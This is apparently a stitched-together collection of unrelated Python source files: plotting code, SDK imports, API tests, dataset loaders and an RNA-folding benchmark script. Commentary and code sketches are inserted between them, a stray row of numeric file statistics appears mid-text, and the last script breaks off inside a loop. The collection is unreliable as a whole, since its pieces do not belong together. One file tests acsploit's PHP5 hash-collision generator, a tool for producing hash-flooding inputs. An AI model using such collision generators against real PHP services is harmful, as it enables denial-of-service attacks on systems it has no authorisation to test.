    sortIndex = histogramData.loc[:, [str(x) + '_plus' for x in range(-50, 51)] + [str(x) + '_minus' for x in range(-50, 51)]].sum(axis=1).sort_values(0, ascending=False).index
    histogramData = histogramData.reindex(sortIndex, axis='index')
    # extract strandProfiles
    strandProfile = {}
    strandProfile['plus'] = histogramData.loc[:, [str(x) + '_plus' for x in range(-50, 51)]]
    strandProfile['minus'] = histogramData.loc[:, [str(x) + '_minus' for x in range(-50, 51)]]
    # create plot data for plus strand / blue color
    blueData = np.zeros([strandProfile['plus'].shape[0], strandProfile['plus'].shape[1], 4])
    blueData[:, :, 2] = np.ones(blueData[:, :, 2].shape)
    blueData[:, :, 3] = strandProfile['plus'] / (np.max(strandProfile['plus'].values) * 0.10)
    # everything above 0.75 is clipped to 0.75
    blueData[blueData[:, :, 3] > 0.75, 3] = 0.75
    # create plot data for minus strand / red color
    redData = np.zeros([strandProfile['minus'].shape[0], strandProfile['minus'].shape[1], 4])
    redData[:, :, 0] = np.ones(redData[:, :, 2].shape)
    redData[:, :, 3] = strandProfile['minus'] / (np.max(strandProfile['minus'].values) * 0.10)
    # everything above 0.75 is clipped to 0.75
    redData[redData[:, :, 3] > 0.75, 3] = 0.75
    # plot histogram
    fig, ax = plt.subplots(figsize=(10, 12))
    plt.xticks([0, 25, 50, 75, 100], [-50, -25, 0, 25, 50])
    plt.xlabel('Distance from Peak [bp]', fontsize=16)
    plt.yticks([], [])
    plt.title('Read distribution around ' + str(len(histogramData)) + ' peaks for ' + TF + ' in ' + cond, fontsize=16)
    ax.imshow(blueData, interpolation=None, aspect='auto')
    ax.imshow(redData, interpolation=None, aspect='auto')
    fig.savefig(path + TF + '_' + cond + '_PeakHistogram_ReadCountSorted.png', dpi=300, bbox_inches="tight")

    # sort peaks after peakStrength
    sortIndex = histogramData.loc[:, 'Peak Strength'].sort_values(0, ascending=False).index
    histogramData = histogramData.reindex(sortIndex, axis='index')
    # extract strandProfiles
    strandProfile = {}
    strandProfile['plus'] = histogramData.loc[:, [str(x) + '_plus' for x in range(-50, 51)]]
    strandProfile['minus'] = histogramData.loc[:, [str(x) + '_minus' for x in range(-50, 51)]]
    # create plot data for plus strand / blue color
    blueData = np.zeros([strandProfile['plus'].shape[0], strandProfile['plus'].shape[1], 4])
    blueData[:, :, 2] = np.ones(blueData[:, :, 2].shape)
    blueData[:, :, 3] = strandProfile['plus'] / (np.max(strandProfile['plus'].values) * 0.10)
    # everything above 0.75 is clipped to 0.75
    blueData[blueData[:, :, 3] > 0.75, 3] = 0.75
    # create plot data for minus strand / red color
    redData = np.zeros([strandProfile['minus'].shape[0], strandProfile['minus'].shape[1], 4])
    redData[:, :, 0] = np.ones(redData[:, :, 2].shape)
    redData[:, :, 3] = strandProfile['minus'] / (np.max(strandProfile['minus'].values) * 0.10)
    # everything above 0.75 is clipped to 0.75
    redData[redData[:, :, 3] > 0.75, 3] = 0.75
    # plot histogram
    fig, ax = plt.subplots(figsize=(10, 12))
    plt.xticks([0, 25, 50, 75, 100], [-50, -25, 0, 25, 50])
    plt.xlabel('Distance from Peak [bp]', fontsize=16)
    plt.yticks([], [])
    plt.title('Read distribution around ' + str(len(histogramData)) + ' peaks for ' + TF + ' in ' + cond, fontsize=16)
    ax.imshow(blueData, interpolation=None, aspect='auto')
    ax.imshow(redData, interpolation=None, aspect='auto')
    fig.savefig(path + TF + '_' + cond + '_PeakHistogram_PeakStrengthSorted.png', dpi=300, bbox_inches="tight")
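# The two imshow calls above overlay plus- and minus-strand reads by packing
# read density into the alpha channel of single-colour RGBA arrays. A standalone
# numpy sketch of that normalise-and-clip step (array values are illustrative,
# not taken from the real data):

```python
import numpy as np

def strand_to_rgba(profile, color_channel, scale=0.10, clip=0.75):
    # Build an RGBA image: solid colour in one channel, alpha proportional to
    # read density, normalised against 10% of the maximum and clipped at 0.75,
    # mirroring the blueData/redData construction above.
    rgba = np.zeros(profile.shape + (4,))
    rgba[:, :, color_channel] = 1.0
    rgba[:, :, 3] = profile / (np.max(profile) * scale)
    rgba[rgba[:, :, 3] > clip, 3] = clip
    return rgba

demo = strand_to_rgba(np.array([[0.5, 10.0], [0.2, 1.0]]), color_channel=2)
```

# Rendering `demo` with `ax.imshow(demo)` would reproduce one such overlay layer.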

# Source: huaweicloud-sdk-tms/huaweicloudsdktms/v1/__init__.py (wuchen-huawei/huaweicloud-sdk-python-v3, Apache-2.0)
# coding: utf-8
from __future__ import absolute_import
# import TmsClient
from huaweicloudsdktms.v1.tms_client import TmsClient
from huaweicloudsdktms.v1.tms_async_client import TmsAsyncClient
# import models into sdk package
from huaweicloudsdktms.v1.model.create_predefine_tags_request import CreatePredefineTagsRequest
from huaweicloudsdktms.v1.model.create_predefine_tags_response import CreatePredefineTagsResponse
from huaweicloudsdktms.v1.model.delete_predefine_tags_request import DeletePredefineTagsRequest
from huaweicloudsdktms.v1.model.delete_predefine_tags_response import DeletePredefineTagsResponse
from huaweicloudsdktms.v1.model.link import Link
from huaweicloudsdktms.v1.model.list_api_versions_request import ListApiVersionsRequest
from huaweicloudsdktms.v1.model.list_api_versions_response import ListApiVersionsResponse
from huaweicloudsdktms.v1.model.list_predefine_tags_request import ListPredefineTagsRequest
from huaweicloudsdktms.v1.model.list_predefine_tags_response import ListPredefineTagsResponse
from huaweicloudsdktms.v1.model.modify_prefine_tag import ModifyPrefineTag
from huaweicloudsdktms.v1.model.predefine_tag import PredefineTag
from huaweicloudsdktms.v1.model.predefine_tag_request import PredefineTagRequest
from huaweicloudsdktms.v1.model.req_create_predefine_tag import ReqCreatePredefineTag
from huaweicloudsdktms.v1.model.req_delete_predefine_tag import ReqDeletePredefineTag
from huaweicloudsdktms.v1.model.show_api_version_request import ShowApiVersionRequest
from huaweicloudsdktms.v1.model.show_api_version_response import ShowApiVersionResponse
from huaweicloudsdktms.v1.model.update_predefine_tags_request import UpdatePredefineTagsRequest
from huaweicloudsdktms.v1.model.update_predefine_tags_response import UpdatePredefineTagsResponse
from huaweicloudsdktms.v1.model.version_detail import VersionDetail

# Source: src/sage/schemes/toric/all.py (UCD4IDS/sage, BSL-1.0)
from sage.misc.lazy_import import lazy_import
lazy_import('sage.schemes.toric.weierstrass', 'WeierstrassForm')
lazy_import('sage.schemes.toric.variety', ['AffineToricVariety', 'ToricVariety'])
lazy_import('sage.schemes.toric.library', 'toric_varieties')
lazy_import('sage.schemes.toric.fano_variety', 'CPRFanoToricVariety')
lazy_import('sage.schemes.toric.ideal', 'ToricIdeal')
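# Each lazy_import call above registers a name whose target module is loaded
# only on first use, which keeps importing this module cheap. A minimal stdlib
# approximation of the idea (an illustrative sketch, not Sage's actual
# implementation):

```python
import importlib

class LazyImport:
    # Resolve `name` from `module` only when first requested.
    def __init__(self, module, name):
        self._module, self._name, self._obj = module, name, None

    def resolve(self):
        if self._obj is None:
            self._obj = getattr(importlib.import_module(self._module), self._name)
        return self._obj

# nothing is imported at construction time; resolution happens on first use:
sqrt = LazyImport("math", "sqrt")
```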

# Source: views/contact.py (vinztheprinze99/ADE-Scheduler, MIT)
from flask import Blueprint, render_template
contact = Blueprint("contact", __name__, static_folder="../static")
@contact.route("/")
def index():
    return render_template("contact.html")

# Source: data/county_level/raw/nchs_mortality/download.py (csinva/covid-19-analysis, MIT)
#! /usr/bin/python3
import os
os.system("wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=11Oy2IEfkeIgA0s5VZTZ4c3obg5A_IQDq' -O nchs_mortality.txt")

# Source: week1/ass1.py (aniruddh09/aniruddh09, MIT)
import numpy as np
print(np.arange(10))

# Source: tests/test_recipes_endpoint.py (iwpnd/toponym-api, MIT)
import json
import pytest
from starlette.status import HTTP_200_OK
from starlette.status import HTTP_404_NOT_FOUND
from toponym import settings
from toponym_api.core.config import API_V1_STR
def is_json(myjson):
    try:
        json.loads(myjson)
    except ValueError:
        return False
    return True
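# The is_json helper just probes json.loads; a quick self-contained check of
# its behaviour (the helper is duplicated here so the snippet runs on its own):

```python
import json

def is_json(myjson):
    try:
        json.loads(myjson)
    except ValueError:
        return False
    return True

ok = is_json('{"recipes": {"_default": []}}')  # well-formed body -> True
bad = is_json("definitely not json")           # parse error -> False
```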
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipes_language_route(test_app, language):
    response = test_app.get(API_V1_STR + f"/recipes/{language}")
    assert response.status_code == HTTP_200_OK


@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipes_language_route_valid_json(test_app, language):
    response = test_app.get(API_V1_STR + f"/recipes/{language}")
    assert is_json(response.content)


@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipes_language_route_default_in_json(test_app, language):
    response = test_app.get(API_V1_STR + f"/recipes/{language}")
    assert "_default" in response.json()["recipes"]


def test_recipes_language_route_language_fails(test_app):
    language = "test"
    response = test_app.get(API_V1_STR + f"/recipes/{language}")
    assert response.status_code == HTTP_404_NOT_FOUND
    assert f"Language: {language} not found" in response.json()["detail"]


@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_language_ending_route_status(test_app, language):
    response = test_app.get(API_V1_STR + f"/recipes/{language}/_default")
    assert response.status_code == HTTP_200_OK


@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_language_ending_route_response_keys(test_app, language):
    response = test_app.get(API_V1_STR + f"/recipes/{language}/_default")
    assert all([k in response.json() for k in ["language", "ending", "recipe"]])


def test_language_ending_route_language_404(test_app):
    language = "fails"
    response = test_app.get(API_V1_STR + f"/recipes/{language}/_default")
    assert response.status_code == HTTP_404_NOT_FOUND
    assert f"Language: {language} not found" in response.json()["detail"]


def test_language_ending_route_ending_404(test_app):
    response = test_app.get(API_V1_STR + f"/recipes/polish/_test")
    assert response.status_code == HTTP_404_NOT_FOUND
    assert "Ending not found" in response.json()["detail"]


@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipe_route_status(test_app, language):
    payload = {"language": language, "word": "test"}
    response = test_app.post(API_V1_STR + f"/recipes/recipe", json=payload)
    assert response.status_code == HTTP_200_OK


@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipe_route_response(test_app, language):
    payload = {"language": language, "word": "test"}
    response = test_app.post(API_V1_STR + f"/recipes/recipe", json=payload)
    assert all(
        [k in response.json() for k in ["language", "word", "longest_ending", "recipe"]]
    )

# Source: drllib/__init__.py (the0demiurge/Deep-Reinforcement-Learning, Apache-2.0)
from drllib.dqn import DQN
from drllib.ddpg import DDPG

# Source: openpharmacophore/tests/test_extractors.py (dprada/OpenPharmacophore, MIT)
def test_dbscan_pharmacophore():
    pass

# Source: test/exploits/hashes/collisions/test_php5_fast.py (drjerry/acsploit, BSD-3-Clause)
from exploits.hashes.collisions import php5_fast
from exploits.hashes.collisions import php5_common
from test.exploits.dummy_output import DummyOutput
from input.chars import CharGenerator
def test_run_small_collision_count():
    output = DummyOutput()
    n_collisions = 20
    hash_table_size = 2**32
    target = '42'
    php5_fast.options['n_collisions'] = n_collisions
    php5_fast.options['n_substrings'] = 10
    php5_fast.options['target_type'] = 'image'
    php5_fast.options['target'] = target
    php5_fast.options['hash_table_size'] = hash_table_size
    php5_fast.run(CharGenerator(), output)
    assert output.count() == n_collisions
    for i in output:
        assert php5_common.php_hash(i, hash_table_size) == int(target)


def test_run_large_collision_count():
    output = DummyOutput()
    n_collisions = 10000
    hash_table_size = 2**32
    target = '42'
    php5_fast.options['n_collisions'] = n_collisions
    php5_fast.options['n_substrings'] = 10
    php5_fast.options['target_type'] = 'image'
    php5_fast.options['target'] = target
    php5_fast.options['hash_table_size'] = hash_table_size
    php5_fast.run(CharGenerator(), output)
    assert output.count() == n_collisions
    for i in output:
        assert php5_common.php_hash(i, hash_table_size) == int(target)


def test_preimage():
    output = DummyOutput()
    n_collisions = 10
    hash_table_size = 2**32
    preimage_target = 'hello world'
    php5_fast.options['n_collisions'] = n_collisions
    php5_fast.options['n_substrings'] = 10
    php5_fast.options['target_type'] = 'preimage'
    php5_fast.options['target'] = preimage_target
    php5_fast.options['hash_table_size'] = hash_table_size
    php5_fast.run(CharGenerator(), output)
    target = php5_common.php_hash(preimage_target, hash_table_size)
    assert output.count() == n_collisions
    for i in output:
        assert php5_common.php_hash(i, hash_table_size) == target


def test_run_small_hash_table_size():
    output = DummyOutput()
    n_collisions = 10
    hash_table_size = 1024
    target = '42'
    php5_fast.options['n_collisions'] = n_collisions
    php5_fast.options['target_type'] = 'image'
    php5_fast.options['n_substrings'] = 3
    php5_fast.options['target'] = target
    php5_fast.options['hash_table_size'] = hash_table_size
    php5_fast.run(CharGenerator(), output)
    assert output.count() == n_collisions
    for i in output:
        assert php5_common.php_hash(i, hash_table_size) == int(target)
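# These tests revolve around php5_common.php_hash, PHP 5's times-33 (DJBX33A)
# string hash reduced modulo the table size. A back-of-the-envelope sketch of
# that hash and the classic two-character collision it admits (this is the
# textbook DJBX33A; acsploit's exact implementation may differ in details):

```python
def times33(s, hash_table_size):
    # DJBX33A: start from 5381, then h = h * 33 + byte for each character,
    # finally reduced into the hash table.
    h = 5381
    for ch in s:
        h = h * 33 + ord(ch)
    return h % hash_table_size

# "Ez" and "FY" are the classic colliding pair under times-33; concatenating
# colliding pairs multiplies the number of colliding strings, the standard
# trick behind multi-collision generators.
assert times33("Ez", 2**32) == times33("FY", 2**32)
```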

# Source: tests/helpers/examples/__init__.py (sashgorokhov-forks/stories, BSD-2-Clause)
# flake8: noqa
import examples.contract
import examples.failure_reasons
import examples.methods
import examples.shortcuts

# Source: test/analytics.py (giuseppe/quay, Apache-2.0)
class FakeMixpanel(object):
    def track(*args, **kwargs):
        pass


def init_app(app):
    return FakeMixpanel()
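# A stub like this lets tests exercise code that calls the analytics interface
# without real network traffic; a short illustration of how such a stub behaves
# (hypothetical usage, not taken from the quay test suite):

```python
class FakeMixpanel(object):
    def track(*args, **kwargs):
        pass

def init_app(app):
    return FakeMixpanel()

# any tracking call becomes a harmless no-op:
analytics = init_app(app=None)
result = analytics.track("user_id", "repo_push", {"repo": "example"})
```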

# Source: Class04/test1.py (BinHan-Code/PythonNetClass, Apache-2.0)
print("Hello")
print("Hello")
print("Hello")


def my_func():
    print("my username")


print("Hello")
print("Hello")
my_func()

# Source: DataReader.py (sibirbil/SimpleKernels, MIT)
import os.path
import numpy as np
from sklearn.datasets import load_svmlight_file
from sklearn.model_selection import train_test_split
my_path = os.path.abspath("./DataSets")
# random state for the datasets (Spambase, Phoneme, Magic) for which training and test parts are not provided
random_state = 42
# *************************************************************************************
def Adult():
    # X_train,y_train=train_Data[0],train_Data[1]
    train_Data = load_svmlight_file(os.path.abspath("./DataSets") + "/LibSVMDataSets" + "/Adult_Training", 123, multilabel=False)
    # X_test, y_test=test_Data[0],test_Data[1]
    test_Data = load_svmlight_file(os.path.abspath("./DataSets") + "/LibSVMDataSets" + "/Adult_Test", 123, multilabel=False)
    # X_train,X_test,y_train,y_test
    return train_Data[0].toarray(), test_Data[0].toarray(), train_Data[1], test_Data[1]
# *************************************************************************************
def Spambase():
    f = open(my_path + "/CIDatasets" + "/Spambase.txt")
    X, y = [], []
    for line in f:
        line = line.split(',')
        y.append(int(line[-1]))
        X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ''])
    return train_test_split(np.array(X), np.array(y), test_size=0.3, random_state=random_state, stratify=np.array(y), shuffle=True)
# *************************************************************************************
def Magic():
    f = open(my_path + "/CIDatasets" + "/Magic.txt")
    X, y = [], []
    for line in f:
        line = line.split(',')
        y.append((line[-1][0]))
        X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ''])
    return train_test_split(np.array(X), np.array(y), test_size=0.3, random_state=random_state, stratify=np.array(y), shuffle=True)
# *************************************************************************************
def Phoneme():
    f = open(my_path + "/CIDatasets" + "/Phoneme.txt")
    X, y = [], []
    for line in f:
        line = line.split(',')
        y.append((line[-1]))
        X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ''])
    return train_test_split(np.array(X), np.array(y), test_size=0.3, random_state=random_state, stratify=np.array(y), shuffle=True)
# *************************************************************************************
def Guide1():
    # X_train,y_train=train_Data[0],train_Data[1]
    train_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Guide_1_Training.txt", 4, multilabel=False)
    # X_test, y_test=test_Data[0],test_Data[1]
    test_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Guide_1_Test.txt", 4, multilabel=False)
    # X_train,X_test,y_train,y_test
    return train_Data[0].toarray(), test_Data[0].toarray(), train_Data[1], test_Data[1]
# *************************************************************************************
def Wilt():
    f = open(my_path + "/CIDatasets" + "/Wilt_Training.txt")
    X_training, y_training = [], []
    for line in f:
        line = line.split(',')
        y_training.append(line[0])
        X_training.append(
            [float(line[i]) for i in range(1, len(line)) if line[i] != '' and line[i] != '\n'])
    f = open(my_path + "/CIDatasets" + "/Wilt_Test.txt")
    X_test, y_test = [], []
    for line in f:
        line = line.split(',')
        y_test.append(line[0])
        X_test.append(
            [float(line[i]) for i in range(1, len(line)) if line[i] != ' ' and line[i] != '\n'])
    return np.array(X_training), np.array(X_test), np.array(y_training), np.array(y_test)
# *************************************************************************************
def Splice():
    # X_train,y_train=train_Data[0],train_Data[1]
    train_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Splice_Training.txt", 60, multilabel=False)
    # X_test, y_test=test_Data[0],test_Data[1]
    test_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Splice_Test.txt", 60, multilabel=False)
    # X_train,X_test,y_train,y_test
    return train_Data[0].toarray(), test_Data[0].toarray(), train_Data[1], test_Data[1]
# *************************************************************************************
def australian():
    # X_train,y_train=train_Data[0],train_Data[1]
    data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Australian", 14, multilabel=False)
    # X,y
    return data[0].toarray(), data[1]
# *************************************************************************************
def fourclass():
    # X_train,y_train=train_Data[0],train_Data[1]
    data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Fourclass", 2, multilabel=False)
    # X,y
    return data[0].toarray(), data[1]
# *************************************************************************************
def ionosphere():
    f = open(my_path + "/CIDatasets" + "/Ionosphere.txt")
    X, y = [], []
    for line in f:
        line = line.split(',')
        y.append(line[-1].replace('\n', ''))
        X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ' '])
    return np.array(X), np.array(y)
# *************************************************************************************
def heart():
    # X_train,y_train=train_Data[0],train_Data[1]
    data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Heart.txt", 13, multilabel=False)
    # X,y
    return data[0].toarray(), data[1]
# *************************************************************************************
def pima():
    # X_train,y_train=train_Data[0],train_Data[1]
    data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Pima_Indians.txt", 8, multilabel=False)
    # X,y
    return data[0].toarray(), data[1]
# *************************************************************************************
def wprognostic():
    f = open(my_path + "/CIDatasets" + "/wisconsinPrognosis.txt")
    X, y = [], []
    for line in f:
        line = line.split(',')
        y.append(line[1].replace('\n', ''))
        X.append([float(line[i]) for i in range(2, len(line)) if line[i] != ' '])
    return np.array(X), np.array(y)
# *************************************************************************************
def bupa():
    f = open(my_path + "/CIDatasets" + "/BupaLiver.txt")
    X, y = [], []
    for line in f:
        line = line.split(',')
        y.append(int(line[-1].replace('\n', '')))
        X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ' '])
    return np.array(X), np.array(y)
# *************************************************************************************
def fertility():
    f = open(my_path + "/CIDatasets" + "/Fertility.txt")
    X, y = [], []
    for line in f:
        line = line.split(',')
        y.append(line[-1])
        X.append([float(line[i]) for i in range(0, len(line) - 1) if line[i] != ' ' and line[i] != '\n'])
    return np.array(X), np.array(y)
# *************************************************************************************
def wdiagnostic():
    # X_train,y_train=train_Data[0],train_Data[1]
    data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Winsconsin_Diagnonis.txt", 10, multilabel=False)
    # X,y
    return data[0].toarray(), data[1]
| 49.026316 | 132 | 0.490875 | 911 | 7,452 | 3.839737 | 0.102086 | 0.064322 | 0.054889 | 0.062893 | 0.80446 | 0.755289 | 0.738708 | 0.738708 | 0.718411 | 0.71498 | 0 | 0.015318 | 0.16774 | 7,452 | 151 | 133 | 49.350993 | 0.548694 | 0.288916 | 0 | 0.447619 | 0 | 0 | 0.118966 | 0.013113 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152381 | false | 0 | 0.038095 | 0 | 0.342857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
# loggingpy/__init__.py (felfel/logging-py, MIT)
from loggingpy.log import Logger, JsonFormatter # noqa F401
from loggingpy.sink import SimpleHttpSink, BundlingHttpSink # noqa F401
# django_tiny_util/__init__.py (olegbo/django-tiny-util, MIT)
"""
Copyright (c) 2020 Oleg Bogumirski <reg@olegb.ru>
"""
__author__ = "Oleg Bogumirski <reg@olegb.ru>"
# NoteBooks/Curso de Python/Python/Inputs-Outputs/Template/tempCodeRunnerFile.py (Alejandro-sin/Learning_Notebooks, MIT)
print('■'*30)
# pymc3_models/__init__.py (Emaasit/pymc3_models, Apache-2.0)
__version__ = "1.1.3"
from pymc3_models.models.HierarchicalLogisticRegression import HierarchicalLogisticRegression
from pymc3_models.models.LinearRegression import LinearRegression
from pymc3_models.models.GaussianProcessRegression import GaussianProcessRegression
from pymc3_models.models.SparseGaussianProcessRegression import SparseGaussianProcessRegression
from pymc3_models.models.StudentsTProcessRegression import StudentsTProcessRegression
# packagetrack/__init__.py (idm2114/packagetrack, MIT)
#!/usr/bin/env python
# author: ian macleod
import packagetrack.getemails
import packagetrack.inputPackage
import packagetrack.tracker
# appium_maya/resources/credentials.py (shuvoprime/Android-Automation, MIT)
import random
import string
class Constantinope:
    pass
# scripts/get_stats_of_css_estimation_programs.py (heartsh/consalifold, MIT)
#! /usr/bin/env python
import utils
from Bio import SeqIO
import seaborn
from matplotlib import pyplot
import os
import math
from math import sqrt
import multiprocessing
import numpy
seaborn.set()
pyplot.rcParams['legend.handlelength'] = 0
pyplot.rcParams['legend.fontsize'] = "large"
color_palette = seaborn.color_palette()
min_gamma = -4
max_gamma = 10
white = "#F2F2F2"
bracket_pairs = [("(", ")"), ("<", ">"), ("{", "}"), ("[", "]"), ("A", "a"), ("B", "b"), ("C", "c"), ("D", "d"), ("E", "e"), ]
def main():
    (current_work_dir_path, asset_dir_path, program_dir_path, conda_program_dir_path) = utils.get_dir_paths()
    num_of_threads = multiprocessing.cpu_count()
    mafft_plus_consalifold_ppvs = []
    mafft_plus_consalifold_senss = []
    mafft_plus_consalifold_fprs = []
    mafft_plus_consalifold_f1_scores = []
    mafft_plus_consalifold_mccs = []
    probcons_plus_consalifold_ppvs = []
    probcons_plus_consalifold_senss = []
    probcons_plus_consalifold_fprs = []
    probcons_plus_consalifold_f1_scores = []
    probcons_plus_consalifold_mccs = []
    clustalw_plus_consalifold_ppvs = []
    clustalw_plus_consalifold_senss = []
    clustalw_plus_consalifold_fprs = []
    clustalw_plus_consalifold_f1_scores = []
    clustalw_plus_consalifold_mccs = []
    mafft_xinsi_plus_consalifold_ppvs = []
    mafft_xinsi_plus_consalifold_senss = []
    mafft_xinsi_plus_consalifold_fprs = []
    mafft_xinsi_plus_consalifold_f1_scores = []
    mafft_xinsi_plus_consalifold_mccs = []
    ref_sa_plus_consalifold_ppvs = []
    ref_sa_plus_consalifold_senss = []
    ref_sa_plus_consalifold_fprs = []
    ref_sa_plus_consalifold_f1_scores = []
    ref_sa_plus_consalifold_mccs = []
    mafft_plus_centroidalifold_ppvs = []
    mafft_plus_centroidalifold_senss = []
    mafft_plus_centroidalifold_fprs = []
    mafft_plus_centroidalifold_f1_scores = []
    mafft_plus_centroidalifold_mccs = []
    probcons_plus_centroidalifold_ppvs = []
    probcons_plus_centroidalifold_senss = []
    probcons_plus_centroidalifold_fprs = []
    probcons_plus_centroidalifold_f1_scores = []
    probcons_plus_centroidalifold_mccs = []
    clustalw_plus_centroidalifold_ppvs = []
    clustalw_plus_centroidalifold_senss = []
    clustalw_plus_centroidalifold_fprs = []
    clustalw_plus_centroidalifold_f1_scores = []
    clustalw_plus_centroidalifold_mccs = []
    mafft_xinsi_plus_centroidalifold_ppvs = []
    mafft_xinsi_plus_centroidalifold_senss = []
    mafft_xinsi_plus_centroidalifold_fprs = []
    mafft_xinsi_plus_centroidalifold_f1_scores = []
    mafft_xinsi_plus_centroidalifold_mccs = []
    ref_sa_plus_centroidalifold_ppvs = []
    ref_sa_plus_centroidalifold_senss = []
    ref_sa_plus_centroidalifold_fprs = []
    ref_sa_plus_centroidalifold_f1_scores = []
    ref_sa_plus_centroidalifold_mccs = []
    mafft_plus_petfold_ppvs = []
    mafft_plus_petfold_senss = []
    mafft_plus_petfold_fprs = []
    mafft_plus_petfold_f1_scores = []
    mafft_plus_petfold_mccs = []
    probcons_plus_petfold_ppvs = []
    probcons_plus_petfold_senss = []
    probcons_plus_petfold_fprs = []
    probcons_plus_petfold_f1_scores = []
    probcons_plus_petfold_mccs = []
    clustalw_plus_petfold_ppvs = []
    clustalw_plus_petfold_senss = []
    clustalw_plus_petfold_fprs = []
    clustalw_plus_petfold_f1_scores = []
    clustalw_plus_petfold_mccs = []
    mafft_xinsi_plus_petfold_ppvs = []
    mafft_xinsi_plus_petfold_senss = []
    mafft_xinsi_plus_petfold_fprs = []
    mafft_xinsi_plus_petfold_f1_scores = []
    mafft_xinsi_plus_petfold_mccs = []
    ref_sa_plus_petfold_ppvs = []
    ref_sa_plus_petfold_senss = []
    ref_sa_plus_petfold_fprs = []
    ref_sa_plus_petfold_f1_scores = []
    ref_sa_plus_petfold_mccs = []
    mafft_plus_rnaalifold_ppv = mafft_plus_rnaalifold_sens = mafft_plus_rnaalifold_fpr = mafft_plus_rnaalifold_f1_score = mafft_plus_rnaalifold_mcc = 0.
    probcons_plus_rnaalifold_ppv = probcons_plus_rnaalifold_sens = probcons_plus_rnaalifold_fpr = probcons_plus_rnaalifold_f1_score = probcons_plus_rnaalifold_mcc = 0.
    clustalw_plus_rnaalifold_ppv = clustalw_plus_rnaalifold_sens = clustalw_plus_rnaalifold_fpr = clustalw_plus_rnaalifold_f1_score = clustalw_plus_rnaalifold_mcc = 0.
    mafft_xinsi_plus_rnaalifold_ppv = mafft_xinsi_plus_rnaalifold_sens = mafft_xinsi_plus_rnaalifold_fpr = mafft_xinsi_plus_rnaalifold_f1_score = mafft_xinsi_plus_rnaalifold_mcc = 0.
    ref_sa_plus_rnaalifold_ppv = ref_sa_plus_rnaalifold_sens = ref_sa_plus_rnaalifold_fpr = ref_sa_plus_rnaalifold_f1_score = ref_sa_plus_rnaalifold_mcc = 0.
    centroidhomfold_ppvs = []
    centroidhomfold_senss = []
    centroidhomfold_fprs = []
    centroidhomfold_f1_scores = []
    centroidhomfold_mccs = []
    locarna_ppv = locarna_sens = locarna_fpr = locarna_f1_score = locarna_mcc = 0.
    raf_ppv = raf_sens = raf_fpr = raf_f1_score = raf_mcc = 0.
    turbofold_ppvs = []
    turbofold_senss = []
    turbofold_fprs = []
    turbofold_f1_scores = []
    turbofold_mccs = []
    gammas = [2. ** i for i in range(min_gamma, max_gamma + 1)]
    rna_fam_dir_path = asset_dir_path + "/compiled_rna_fams_test"
    ref_sa_dir_path = asset_dir_path + "/ref_sas_test"
    mafft_plus_consalifold_css_dir_path = asset_dir_path + "/mafft_plus_consalifold"
    probcons_plus_consalifold_css_dir_path = asset_dir_path + "/probcons_plus_consalifold"
    clustalw_plus_consalifold_css_dir_path = asset_dir_path + "/clustalw_plus_consalifold"
    mafft_xinsi_plus_consalifold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_consalifold"
    ref_sa_plus_consalifold_css_dir_path = asset_dir_path + "/ref_sa_plus_consalifold"
    mafft_plus_centroidalifold_css_dir_path = asset_dir_path + "/mafft_plus_centroidalifold"
    probcons_plus_centroidalifold_css_dir_path = asset_dir_path + "/probcons_plus_centroidalifold"
    clustalw_plus_centroidalifold_css_dir_path = asset_dir_path + "/clustalw_plus_centroidalifold"
    mafft_xinsi_plus_centroidalifold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_centroidalifold"
    ref_sa_plus_centroidalifold_css_dir_path = asset_dir_path + "/ref_sa_plus_centroidalifold"
    mafft_plus_rnaalifold_css_dir_path = asset_dir_path + "/mafft_plus_rnaalifold"
    probcons_plus_rnaalifold_css_dir_path = asset_dir_path + "/probcons_plus_rnaalifold"
    clustalw_plus_rnaalifold_css_dir_path = asset_dir_path + "/clustalw_plus_rnaalifold"
    mafft_xinsi_plus_rnaalifold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_rnaalifold"
    ref_sa_plus_rnaalifold_css_dir_path = asset_dir_path + "/ref_sa_plus_rnaalifold"
    mafft_plus_petfold_css_dir_path = asset_dir_path + "/mafft_plus_petfold"
    probcons_plus_petfold_css_dir_path = asset_dir_path + "/probcons_plus_petfold"
    clustalw_plus_petfold_css_dir_path = asset_dir_path + "/clustalw_plus_petfold"
    mafft_xinsi_plus_petfold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_petfold"
    ref_sa_plus_petfold_css_dir_path = asset_dir_path + "/ref_sa_plus_petfold"
    centroidhomfold_ss_dir_path = asset_dir_path + "/centroidhomfold"
    locarna_css_dir_path = asset_dir_path + "/locarna"
    raf_css_dir_path = asset_dir_path + "/raf"
    turbofold_ss_dir_path = asset_dir_path + "/turbofold"
    pool = multiprocessing.Pool(num_of_threads)
    for gamma in gammas:
